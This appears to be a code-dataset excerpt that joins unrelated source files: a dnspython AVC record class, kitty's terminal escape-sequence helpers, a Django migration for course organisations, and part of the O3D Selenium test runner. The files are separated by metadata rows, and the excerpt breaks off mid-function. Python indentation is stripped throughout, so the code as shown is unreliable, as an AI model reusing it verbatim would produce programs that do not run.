# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.txtbase
class AVC(dns.rdtypes.txtbase.TXTBase):
"""AVC record
@see: U{http://www.iana.org/assignments/dns-parameters/AVC/avc-completed-template}"""
| mit | -1,819,311,365,849,486,800 | 40.08 | 89 | 0.773126 | false |
kovidgoyal/kitty | kittens/tui/operations.py | 1 | 11292 | #!/usr/bin/env python3
# vim:fileencoding=utf-8
# License: GPL v3 Copyright: 2018, Kovid Goyal <kovid at kovidgoyal.net>
import sys
from contextlib import contextmanager
from functools import wraps
from typing import (
IO, Any, Callable, Dict, Generator, Optional, Tuple, TypeVar, Union
)
from kitty.rgb import Color, color_as_sharp, to_color
from kitty.typing import GraphicsCommandType, HandlerType, ScreenSize
from .operations_stub import CMD
GraphicsCommandType, ScreenSize # needed for stub generation
S7C1T = '\033 F'
SAVE_CURSOR = '\0337'
RESTORE_CURSOR = '\0338'
SAVE_PRIVATE_MODE_VALUES = '\033[?s'
RESTORE_PRIVATE_MODE_VALUES = '\033[?r'
SAVE_COLORS = '\033[#P'
RESTORE_COLORS = '\033[#Q'
MODES = dict(
LNM=(20, ''),
IRM=(4, ''),
DECKM=(1, '?'),
DECSCNM=(5, '?'),
DECOM=(6, '?'),
DECAWM=(7, '?'),
DECARM=(8, '?'),
DECTCEM=(25, '?'),
MOUSE_BUTTON_TRACKING=(1000, '?'),
MOUSE_MOTION_TRACKING=(1002, '?'),
MOUSE_MOVE_TRACKING=(1003, '?'),
FOCUS_TRACKING=(1004, '?'),
MOUSE_UTF8_MODE=(1005, '?'),
MOUSE_SGR_MODE=(1006, '?'),
MOUSE_URXVT_MODE=(1015, '?'),
ALTERNATE_SCREEN=(1049, '?'),
BRACKETED_PASTE=(2004, '?'),
)
F = TypeVar('F')
all_cmds: Dict[str, Callable] = {}
def cmd(f: F) -> F:
all_cmds[f.__name__] = f # type: ignore
return f
@cmd
def set_mode(which: str, private: bool = True) -> str:
num, private_ = MODES[which]
return '\033[{}{}h'.format(private_, num)
@cmd
def reset_mode(which: str) -> str:
num, private = MODES[which]
return '\033[{}{}l'.format(private, num)
@cmd
def clear_screen() -> str:
return '\033[H\033[2J'
@cmd
def clear_to_end_of_screen() -> str:
return '\033[J'
@cmd
def clear_to_eol() -> str:
return '\033[K'
@cmd
def reset_terminal() -> str:
return '\033]\033\\\033c'
@cmd
def bell() -> str:
return '\a'
@cmd
def beep() -> str:
return '\a'
@cmd
def set_window_title(value: str) -> str:
return '\033]2;' + value.replace('\033', '').replace('\x9c', '') + '\033\\'
@cmd
def set_line_wrapping(yes_or_no: bool) -> str:
return set_mode('DECAWM') if yes_or_no else reset_mode('DECAWM')
@cmd
def set_cursor_visible(yes_or_no: bool) -> str:
return set_mode('DECTCEM') if yes_or_no else reset_mode('DECTCEM')
@cmd
def set_cursor_position(x: int, y: int) -> str: # (0, 0) is top left
return '\033[{};{}H'.format(y + 1, x + 1)
@cmd
def move_cursor_by(amt: int, direction: str) -> str:
suffix = {'up': 'A', 'down': 'B', 'right': 'C', 'left': 'D'}[direction]
return f'\033[{amt}{suffix}'
@cmd
def set_cursor_shape(shape: str = 'block', blink: bool = True) -> str:
val = {'block': 1, 'underline': 3, 'bar': 5}.get(shape, 1)
if not blink:
val += 1
return '\033[{} q'.format(val)
@cmd
def set_scrolling_region(screen_size: Optional['ScreenSize'] = None, top: Optional[int] = None, bottom: Optional[int] = None) -> str:
if screen_size is None:
return '\033[r'
if top is None:
top = 0
if bottom is None:
bottom = screen_size.rows - 1
if bottom < 0:
bottom = screen_size.rows - 1 + bottom
else:
bottom += 1
return '\033[{};{}r'.format(top + 1, bottom + 1)
@cmd
def scroll_screen(amt: int = 1) -> str:
return '\033[' + str(abs(amt)) + ('T' if amt < 0 else 'S')
STANDARD_COLORS = {name: i for i, name in enumerate(
'black red green yellow blue magenta cyan gray'.split())}
STANDARD_COLORS['white'] = STANDARD_COLORS['gray']
UNDERLINE_STYLES = {name: i + 1 for i, name in enumerate(
'straight double curly'.split())}
ColorSpec = Union[int, str, Tuple[int, int, int]]
def color_code(color: ColorSpec, intense: bool = False, base: int = 30) -> str:
if isinstance(color, str):
e = str((base + 60 if intense else base) + STANDARD_COLORS[color])
elif isinstance(color, int):
e = '{}:5:{}'.format(base + 8, max(0, min(color, 255)))
else:
e = '{}:2:{}:{}:{}'.format(base + 8, *color)
return e
@cmd
def sgr(*parts: str) -> str:
return '\033[{}m'.format(';'.join(parts))
@cmd
def colored(
text: str,
color: ColorSpec,
intense: bool = False,
reset_to: Optional[ColorSpec] = None,
reset_to_intense: bool = False
) -> str:
e = color_code(color, intense)
return '\033[{}m{}\033[{}m'.format(e, text, 39 if reset_to is None else color_code(reset_to, reset_to_intense))
@cmd
def faint(text: str) -> str:
return colored(text, 'black', True)
@cmd
def styled(
text: str,
fg: Optional[ColorSpec] = None,
bg: Optional[ColorSpec] = None,
fg_intense: bool = False,
bg_intense: bool = False,
italic: Optional[bool] = None,
bold: Optional[bool] = None,
underline: Optional[str] = None,
underline_color: Optional[ColorSpec] = None,
reverse: Optional[bool] = None
) -> str:
start, end = [], []
if fg is not None:
start.append(color_code(fg, fg_intense))
end.append('39')
if bg is not None:
start.append(color_code(bg, bg_intense, 40))
end.append('49')
if underline_color is not None:
if isinstance(underline_color, str):
underline_color = STANDARD_COLORS[underline_color]
start.append(color_code(underline_color, base=50))
end.append('59')
if underline is not None:
start.append('4:{}'.format(UNDERLINE_STYLES[underline]))
end.append('4:0')
if italic is not None:
s, e = (start, end) if italic else (end, start)
s.append('3')
e.append('23')
if bold is not None:
s, e = (start, end) if bold else (end, start)
s.append('1')
e.append('22')
if reverse is not None:
s, e = (start, end) if reverse else (end, start)
s.append('7')
e.append('27')
if not start:
return text
return '\033[{}m{}\033[{}m'.format(';'.join(start), text, ';'.join(end))
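# Added usage sketch (color names and styles below are illustrative):
#   styled('error', fg='red', bold=True)
#   styled('hint', fg=244, italic=True)                    # 256-color index
#   styled('link', fg=(0, 200, 0), underline='curly', underline_color='green')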
def serialize_gr_command(cmd: Dict[str, Union[int, str]], payload: Optional[bytes] = None) -> bytes:
from .images import GraphicsCommand
gc = GraphicsCommand()
for k, v in cmd.items():
setattr(gc, k, v)
return gc.serialize(payload or b'')
@cmd
def gr_command(cmd: Union[Dict, 'GraphicsCommandType'], payload: Optional[bytes] = None) -> str:
if isinstance(cmd, dict):
raw = serialize_gr_command(cmd, payload)
else:
raw = cmd.serialize(payload or b'')
return raw.decode('ascii')
@cmd
def clear_images_on_screen(delete_data: bool = False) -> str:
from .images import GraphicsCommand
gc = GraphicsCommand()
gc.a = 'd'
gc.d = 'A' if delete_data else 'a'
return gc.serialize().decode('ascii')
def init_state(alternate_screen: bool = True) -> str:
ans = (
S7C1T + SAVE_CURSOR + SAVE_PRIVATE_MODE_VALUES + reset_mode('LNM') +
reset_mode('IRM') + reset_mode('DECKM') + reset_mode('DECSCNM') +
set_mode('DECARM') + set_mode('DECAWM') +
set_mode('DECTCEM') + reset_mode('MOUSE_BUTTON_TRACKING') +
reset_mode('MOUSE_MOTION_TRACKING') + reset_mode('MOUSE_MOVE_TRACKING') +
reset_mode('FOCUS_TRACKING') + reset_mode('MOUSE_UTF8_MODE') +
reset_mode('MOUSE_SGR_MODE') + reset_mode('MOUSE_UTF8_MODE') +
set_mode('BRACKETED_PASTE') + SAVE_COLORS +
'\033[*x' # reset DECSACE to default region select
)
if alternate_screen:
ans += set_mode('ALTERNATE_SCREEN') + reset_mode('DECOM')
ans += clear_screen()
ans += '\033[>31u' # extended keyboard mode
return ans
def reset_state(normal_screen: bool = True) -> str:
ans = ''
ans += '\033[<u' # restore keyboard mode
if normal_screen:
ans += reset_mode('ALTERNATE_SCREEN')
ans += RESTORE_PRIVATE_MODE_VALUES
ans += RESTORE_CURSOR
ans += RESTORE_COLORS
return ans
@contextmanager
def cursor(write: Callable[[str], None]) -> Generator[None, None, None]:
write(SAVE_CURSOR)
yield
write(RESTORE_CURSOR)
@contextmanager
def alternate_screen(f: Optional[IO[str]] = None) -> Generator[None, None, None]:
f = f or sys.stdout
print(set_mode('ALTERNATE_SCREEN'), end='', file=f)
yield
print(reset_mode('ALTERNATE_SCREEN'), end='', file=f)
@contextmanager
def raw_mode(fd: Optional[int] = None) -> Generator[None, None, None]:
import tty
import termios
if fd is None:
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
try:
tty.setraw(fd)
yield
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old)
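# Example (illustrative): read a single keypress with no echo or line
# buffering by combining raw_mode() with a blocking read on stdin.
#   with raw_mode():
#       key = sys.stdin.read(1)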
@cmd
def set_default_colors(
fg: Optional[Union[Color, str]] = None,
bg: Optional[Union[Color, str]] = None,
cursor: Optional[Union[Color, str]] = None,
select_bg: Optional[Union[Color, str]] = None,
select_fg: Optional[Union[Color, str]] = None
) -> str:
ans = ''
def item(which: Optional[Union[Color, str]], num: int) -> None:
nonlocal ans
if which is None:
ans += '\x1b]1{}\x1b\\'.format(num)
else:
if isinstance(which, Color):
q = color_as_sharp(which)
else:
x = to_color(which)
assert x is not None
q = color_as_sharp(x)
ans += '\x1b]{};{}\x1b\\'.format(num, q)
item(fg, 10)
item(bg, 11)
item(cursor, 12)
item(select_bg, 17)
item(select_fg, 19)
return ans
@cmd
def write_to_clipboard(data: Union[str, bytes], use_primary: bool = False) -> str:
if isinstance(data, str):
data = data.encode('utf-8')
from base64 import standard_b64encode
fmt = 'p' if use_primary else 'c'
def esc(chunk: str) -> str:
return '\x1b]52;{};{}\x07'.format(fmt, chunk)
ans = esc('!') # clear clipboard buffer
for chunk in (data[i:i+512] for i in range(0, len(data), 512)):
s = standard_b64encode(chunk).decode('ascii')
ans += esc(s)
return ans
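# Example (illustrative): the OSC 52 sequence built above is chunked and
# base64 encoded, so arbitrary text can be copied by simply printing it.
#   sys.stdout.write(write_to_clipboard('hello from kitty'))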
@cmd
def request_from_clipboard(use_primary: bool = False) -> str:
return '\x1b]52;{};?\x07'.format('p' if use_primary else 'c')
# Boilerplate to make operations available via Handler.cmd {{{
def writer(handler: HandlerType, func: Callable) -> Callable:
@wraps(func)
def f(*a: Any, **kw: Any) -> None:
handler.write(func(*a, **kw))
return f
def commander(handler: HandlerType) -> CMD:
ans = CMD()
for name, func in all_cmds.items():
setattr(ans, name, writer(handler, func))
return ans
def func_sig(func: Callable) -> Generator[str, None, None]:
import inspect
import re
s = inspect.signature(func)
for val in s.parameters.values():
yield re.sub(r'ForwardRef\([\'"](\w+?)[\'"]\)', r'\1', str(val).replace('NoneType', 'None'))
def as_type_stub() -> str:
ans = [
'from typing import * # noqa',
'from kitty.typing import GraphicsCommandType, ScreenSize',
'from kitty.rgb import Color',
'import kitty.rgb',
]
methods = []
for name, func in all_cmds.items():
args = ', '.join(func_sig(func))
if args:
args = ', ' + args
methods.append(' def {}(self{}) -> str: pass'.format(name, args))
ans += ['', '', 'class CMD:'] + methods
return '\n'.join(ans) + '\n\n\n'
# }}}
| gpl-3.0 | -8,834,894,098,076,934,000 | 26.144231 | 133 | 0.590418 | false |
DYWCn/mxonline | MXOnline/apps/origanization/migrations/0001_initial.py | 1 | 3648 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-03-24 08:13
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CityDict',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u673a\u6784\u540d\u79f0')),
('desc', models.CharField(max_length=100, verbose_name='\u57ce\u5e02\u63cf\u8ff0')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
],
options={
'verbose_name': '\u673a\u6784',
'verbose_name_plural': '\u673a\u6784',
},
),
migrations.CreateModel(
name='CourseOrg',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u673a\u6784\u540d\u79f0')),
('desc', models.TextField(verbose_name='\u673a\u6784\u4ecb\u7ecd')),
('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
('fav_num', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
('cover_image', models.ImageField(upload_to='org/cover_img/%Y/%m', verbose_name='\u5c01\u9762')),
('address', models.CharField(max_length=100, verbose_name='\u673a\u6784\u5730\u5740')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='origanization.CityDict', verbose_name='\u6240\u5728\u57ce\u5e02')),
],
options={
'verbose_name': '\u673a\u6784',
'verbose_name_plural': '\u673a\u6784',
},
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u8bb2\u5e08\u59d3\u540d')),
('work_years', models.IntegerField(default=0, verbose_name='\u5de5\u4f5c\u65f6\u95f4')),
('work_company', models.CharField(max_length=20, verbose_name='\u6240\u5c5e\u673a\u6784')),
('characters', models.CharField(max_length=50, verbose_name='\u6559\u5b66\u7279\u70b9')),
('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
('fav_num', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
('cover_image', models.ImageField(upload_to='org/cover_img/%Y/%m', verbose_name='\u5c01\u9762')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
('org', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='origanization.CourseOrg', verbose_name='\u673a\u6784')),
],
options={
'verbose_name': '\u8bb2\u5e08\u4fe1\u606f',
'verbose_name_plural': '\u8bb2\u5e08\u4fe1\u606f',
},
),
]
| mit | -4,469,214,834,793,879,000 | 52.647059 | 159 | 0.587171 | false |
rwatson/chromium-capsicum | o3d/tests/selenium/main.py | 1 | 24571 | #!/usr/bin/python2.4
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Selenium tests for the O3D plugin.
Sets up a local Selenium Remote Control server and a static file
server that serves files off the o3d directory.
Launches browsers to test the local build of the o3d plugin
and reports results back to the user.
"""
import os
import sys
script_dir = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
o3d_dir = os.path.dirname(os.path.dirname(script_dir))
src_dir = os.path.dirname(o3d_dir)
third_party_dir = os.path.join(src_dir, 'third_party')
o3d_third_party_dir = os.path.join(o3d_dir, 'third_party')
gflags_dir = os.path.join(o3d_third_party_dir, 'gflags', 'python')
selenium_dir = os.path.join(third_party_dir, 'selenium_rc', 'files')
selenium_py_dir = os.path.join(selenium_dir, 'selenium-python-client-driver')
sys.path.append(gflags_dir)
sys.path.append(selenium_py_dir)
import re
import SimpleHTTPServer
import socket
import SocketServer
import subprocess
import threading
import time
import unittest
import gflags
import javascript_unit_tests
import test_runner
import selenium
import samples_tests
import selenium_constants
import selenium_utilities
import pdiff_test
import Queue
if sys.platform == 'win32' or sys.platform == 'cygwin':
default_java_exe = "java.exe"
else:
default_java_exe = "java"
# Command line flags
FLAGS = gflags.FLAGS
gflags.DEFINE_boolean("verbose", False, "verbosity")
gflags.DEFINE_boolean("screenshots", False, "takes screenshots")
gflags.DEFINE_string(
"java",
default_java_exe,
"specifies the path to the java executable.")
gflags.DEFINE_string(
"selenium_server",
os.path.join(selenium_dir, 'selenium-server', 'selenium-server.jar'),
"specifies the path to the selenium server jar.")
gflags.DEFINE_string(
"product_dir",
None,
"specifies the path to the build output directory.")
gflags.DEFINE_string(
"screencompare",
"",
"specifies the directory in which perceptualdiff resides.\n"
"compares screenshots with reference images")
gflags.DEFINE_string(
"screenshotsdir",
selenium_constants.DEFAULT_SCREENSHOT_PATH,
"specifies the directory in which screenshots will be stored.")
gflags.DEFINE_string(
"referencedir",
selenium_constants.DEFAULT_SCREENSHOT_PATH,
"Specifies the directory where reference images will be read from.")
gflags.DEFINE_string(
"testprefix", "Test",
"specifies the prefix of tests to run")
gflags.DEFINE_string(
"testsuffixes",
"small,medium,large",
"specifies the suffixes, separated by commas of tests to run")
gflags.DEFINE_string(
"servertimeout",
"30",
"Specifies the timeout value, in seconds, for the selenium server.")
# Browsers to choose from (for browser flag).
# use --browser $BROWSER_NAME to run
# tests for that browser
gflags.DEFINE_list(
"browser",
"*firefox",
"\n".join(["comma-separated list of browsers to test",
"Options:"] +
selenium_constants.SELENIUM_BROWSER_SET))
gflags.DEFINE_string(
"browserpath",
"",
"specifies the path to the browser executable "
"(for platforms that don't support MOZ_PLUGIN_PATH)")
gflags.DEFINE_string(
"samplespath",
"",
"specifies the path from the web root to the samples.")
class MyRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Hook to handle HTTP server requests.
Functions as a handler for logging and other utility functions.
"""
def log_message(self, format, *args):
"""Logging hook for HTTP server."""
# For now, just suppress logging.
pass
# TODO: might be nice to have a verbose option for debugging.
class LocalFileHTTPServer(threading.Thread):
"""Minimal HTTP server that serves local files.
Members:
http_alive: event to signal that http server is up and running
http_port: the TCP port the server is using
"""
START_PORT = 8100
END_PORT = 8105
def __init__(self, local_root=None):
"""Initializes the server.
Initializes the HTTP server to serve static files from the
local o3d directory
Args:
local_root: all files below this path are served. If not specified,
the current directory is the root.
"""
threading.Thread.__init__(self)
self._local_root = local_root
self.http_alive = threading.Event()
self.http_port = 0
def run(self):
"""Runs the HTTP server.
Server is started on an available port in the range of
START_PORT to END_PORT
"""
if self._local_root:
os.chdir(self._local_root)
for self.http_port in range(self.START_PORT, self.END_PORT):
# Attempt to start the server
try:
httpd = SocketServer.TCPServer(("", self.http_port),
MyRequestHandler)
except socket.error:
# Server didn't manage to start up, try another port.
pass
else:
self.http_alive.set()
httpd.serve_forever()
if not self.http_alive.isSet():
print("No available port found for HTTP server in the range %d to %d."
% (self.START_PORT, self.END_PORT))
self.http_port = 0
@staticmethod
def StartServer(local_root=None):
"""Create and start a LocalFileHTTPServer on a separate thread.
Args:
local_root: serve all static files below this directory. If not
specified, the current directory is the root.
Returns:
http_server: LocalFileHTTPServer() object
"""
    # Start up the local HTTP server
http_server = LocalFileHTTPServer(local_root)
http_server.setDaemon(True)
http_server.start()
time_out = 30.0
# Wait till the Selenium RC Server is up
print 'Waiting %d seconds for local HTTP server to start.' % (int(time_out))
http_server.http_alive.wait(time_out)
if not http_server.http_port:
print 'Timed out.'
return None
print "LocalFileHTTPServer started on port %d" % http_server.http_port
return http_server
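# Example (illustrative): serve a build output directory on the first free
# port in the range; the path below is a placeholder.
#   server = LocalFileHTTPServer.StartServer('/path/to/product_dir')
#   if server:
#     print "Serving on port %d" % server.http_port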
class SeleniumRemoteControl(threading.Thread):
"""A thread that launches the Selenium Remote Control server.
The Remote Control server allows us to launch a browser and remotely
control it from a script.
Members:
selenium_alive: event to signal that selenium server is up and running
selenium_port: the TCP port the server is using
process: the subprocess.Popen instance for the server
"""
START_PORT = 5430
END_PORT = 5535
def __init__(self, verbose, java_path, selenium_server, server_timeout):
"""Initializes the SeleniumRemoteControl class.
Args:
verbose: boolean verbose flag
java_path: path to java used to run selenium.
selenium_server: path to jar containing selenium server.
server_timeout: server timeout value, in seconds.
"""
self.selenium_alive = threading.Event()
self.selenium_port = 0
self.verbose = verbose
self.java_path = java_path
self.selenium_server = selenium_server
self.timeout = server_timeout
threading.Thread.__init__(self)
def run(self):
"""Starts the selenium server.
Server is started on an available port in the range of
START_PORT to END_PORT
"""
for self.selenium_port in range(self.START_PORT, self.END_PORT):
# Attempt to start the selenium RC server from java
self.process = subprocess.Popen(
[self.java_path, "-jar", self.selenium_server, "-multiWindow",
"-port", str(self.selenium_port), "-timeout", self.timeout],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for unused_i in range(1, 10):
server_msg = self.process.stdout.readline()
if self.verbose and server_msg is not None:
# log if verbose flag is on
print "sel_serv:" + server_msg
# This status message indicates that the server has done
# a bind to the port self.selenium_port successfully.
if server_msg.find("INFO - Started SocketListener") != -1:
self.selenium_alive.set()
break
# Error starting server on this port, try the next port.
if not self.selenium_alive.isSet():
continue
# Loop and read from stdout
while self.process.poll() is None:
server_msg = self.process.stdout.readline()
if self.verbose and server_msg is not None:
# log if verbose flag is on
print "sel_serv:" + server_msg
# Finish.
break
if not self.selenium_alive.isSet():
print("No available port found for Selenium RC Server "
"in the range %d to %d."
% (self.START_PORT, self.END_PORT))
self.selenium_port = 0
@staticmethod
def StartServer(verbose, java_path, selenium_server, server_timeout):
"""Create and start the Selenium RC Server on a separate thread.
Args:
verbose: boolean verbose flag
java_path: path to java used to run selenium.
selenium_server: path to jar containing selenium server.
server_timeout: server timeout value, in seconds
Returns:
selenium_server: SeleniumRemoteControl() object
"""
# Start up the Selenium Remote Control server
selenium_server = SeleniumRemoteControl(verbose,
java_path,
selenium_server,
server_timeout)
selenium_server.setDaemon(True)
selenium_server.start()
time_out = 30.0
# Wait till the Selenium RC Server is up
print 'Waiting %d seconds for Selenium RC to start.' % (int(time_out))
selenium_server.selenium_alive.wait(time_out)
if not selenium_server.selenium_port:
print 'Timed out.'
return None
print("Selenium RC server started on port %d"
% selenium_server.selenium_port)
return selenium_server
class SeleniumSessionBuilder:
def __init__(self, sel_port, sel_timeout, http_port, browserpath):
self.sel_port = sel_port
self.sel_timeout = sel_timeout
self.http_port = http_port
self.browserpath = browserpath
def NewSeleniumSession(self, browser):
if browser == "*googlechrome":
# TODO: Replace socket.gethostname() with "localhost"
# once Chrome local proxy fix is in.
server_url = "http://" + socket.gethostname() + ":"
else:
server_url = "http://localhost:"
server_url += str(self.http_port)
browser_path_with_space = ""
if self.browserpath:
browser_path_with_space = " " + self.browserpath
new_session = selenium.selenium("localhost",
self.sel_port,
browser + browser_path_with_space,
server_url)
new_session.start()
new_session.set_timeout(self.sel_timeout)
if browser == "*iexplore":
# This improves stability on IE, especially IE 6. It at least fixes the
# StressWindow test. It adds a 10ms delay between selenium commands.
new_session.set_speed(10)
return new_session
def TestBrowser(session_builder, browser, test_list, verbose):
"""Runs Selenium tests for a specific browser.
Args:
session_builder: session_builder for creating new selenium sessions.
browser: selenium browser name (eg. *iexplore, *firefox).
test_list: list of tests.
Returns:
summary_result: result of test runners.
"""
print "Testing %s..." % browser
summary_result = test_runner.TestResult(test_runner.StringBuffer(), browser,
verbose)
# Fill up the selenium test queue.
test_queue = Queue.Queue()
for test in test_list:
test_queue.put(test)
pdiff_queue = None
if FLAGS.screenshots:
# Need to do screen comparisons.
# |pdiff_queue| is the queue of perceptual diff tests that need to be done.
    # This queue is added to by individual selenium test runners.
# |pdiff_result_queue| is the result of the perceptual diff tests.
pdiff_queue = Queue.Queue()
pdiff_result_queue = Queue.Queue()
pdiff_worker = test_runner.PDiffTestRunner(pdiff_queue,
pdiff_result_queue,
browser, verbose)
pdiff_worker.start()
# Start initial selenium test runner.
worker = test_runner.SeleniumTestRunner(session_builder, browser,
test_queue, pdiff_queue,
verbose)
worker.start()
# Run through all selenium tests.
while not worker.IsCompletelyDone():
if worker.IsTesting() and worker.IsPastDeadline():
      # Test has taken more than the allotted time. Abort and go to the next test.
worker.AbortTest()
elif worker.DidFinishTest():
      # Do this so that a worker does not grab a test off the queue till we tell it.
result = worker.Continue()
result.printAll(sys.stdout)
summary_result.merge(result)
# Sleep here for a brief time. This thread is polling the worker thread.
# We cannot wait for a message from the worker thread because the worker
# may hang on a bad test. We also do not want to sleep till the test's
# deadline because the test may finish before then.
time.sleep(.1)
if FLAGS.screenshots:
# Finish screenshot comparisons.
pdiff_worker.EndTesting()
while not pdiff_worker.IsCompletelyDone():
time.sleep(1)
    # Be careful here, make sure no one else is editing |pdiff_result_queue|.
while not pdiff_result_queue.empty():
result = pdiff_result_queue.get()
result.printAll(sys.stdout)
summary_result.merge(result)
return summary_result
def MatchesSuffix(name, suffixes):
"""Checks if a name ends in one of the suffixes.
Args:
name: Name to test.
suffixes: list of suffixes to test for.
Returns:
True if name ends in one of the suffixes or if suffixes is empty.
"""
if suffixes:
name_lower = name.lower()
for suffix in suffixes:
if name_lower.endswith(suffix):
return True
return False
else:
return True
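# Example (illustrative): suffix matching is case-insensitive and an empty
# suffix list accepts every name.
#   MatchesSuffix('TestTexturesSmall', ['small'])  # -> True
#   MatchesSuffix('TestTexturesLarge', [])         # -> True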
def _GetTestsFromFile(filename, prefix, test_prefix_filter, test_suffixes,
browser, module, path_to_html):
"""Add tests defined in filename, and associated perceptual diff test, if
needed.
Assumes module has a method "GenericTest" that uses self.args to run.
Args:
filename: filename of file with list of tests.
prefix: prefix to add to the beginning of each test.
test_prefix_filter: Only adds a test if it starts with this.
test_suffixes: list of suffixes to filter by. An empty list = pass all.
browser: browser name.
module: module which will have method GenericTest() called to run each test.
path_to_html: Path from server root to html
"""
# See comments in that file for the expected format.
# skip lines that are blank or have "#" or ";" as their first non whitespace
# character.
test_list_file = open(filename, "r")
samples = test_list_file.readlines()
test_list_file.close()
tests = []
for sample in samples:
sample = sample.strip()
if not sample or sample[0] == ";" or sample[0] == "#":
continue
arguments = sample.split()
test_type = arguments[0].lower()
test_path = arguments[1]
options = arguments[2:]
# TODO: Add filter based on test_type
test_skipped = False
if test_path.startswith("Test"):
name = test_path
else:
# Need to make a name.
name = ("Test" + prefix + re.sub("\W", "_", test_path) +
test_type.capitalize())
# Only test suffixes for generic tests. That is how it has always worked.
if test_suffixes and not MatchesSuffix(name, test_suffixes):
test_skipped = True
if test_prefix_filter and not name.startswith(test_prefix_filter):
test_skipped = True
# Only execute this test if the current browser is not in the list
# of skipped browsers.
screenshot_count = 0
for option in options:
if option.startswith("except"):
skipped_platforms = selenium_utilities.GetArgument(option)
if not skipped_platforms is None:
skipped_platforms = skipped_platforms.split(",")
if browser in skipped_platforms:
test_skipped = True
elif option.startswith("screenshots"):
screenshot_count += int(selenium_utilities.GetArgument(option))
elif option.startswith("screenshot"):
screenshot_count += 1
if not test_skipped:
# Add a test method with this name if it doesn't exist.
if not (hasattr(module, name) and callable(getattr(module, name))):
setattr(module, name, module.GenericTest)
new_test = module(name, browser, path_to_html, test_type, test_path,
options)
if screenshot_count and FLAGS.screenshots:
pdiff_name = name + 'Screenshots'
screenshot = selenium_utilities.ScreenshotNameFromTestName(test_path)
setattr(pdiff_test.PDiffTest, pdiff_name,
pdiff_test.PDiffTest.PDiffTest)
new_pdiff = pdiff_test.PDiffTest(pdiff_name,
screenshot_count,
screenshot,
FLAGS.screencompare,
FLAGS.screenshotsdir,
FLAGS.referencedir,
options)
tests += [(new_test, new_pdiff)]
else:
tests += [new_test]
return tests
def GetTestsForBrowser(browser, test_prefix, test_suffixes):
"""Returns list of tests from test files.
Args:
browser: browser name
test_prefix: prefix of tests to run.
test_suffixes: A comma separated string of suffixes to filter by.
Returns:
A list of unittest.TestCase.
"""
tests = []
suffixes = test_suffixes.split(",")
# add sample tests.
filename = os.path.abspath(os.path.join(script_dir, "sample_list.txt"))
tests += _GetTestsFromFile(filename, "Sample", test_prefix, suffixes, browser,
samples_tests.SampleTests,
FLAGS.samplespath.replace("\\","/"))
# add javascript tests.
filename = os.path.abspath(os.path.join(script_dir,
"javascript_unit_test_list.txt"))
tests += _GetTestsFromFile(filename, "UnitTest", test_prefix, suffixes,
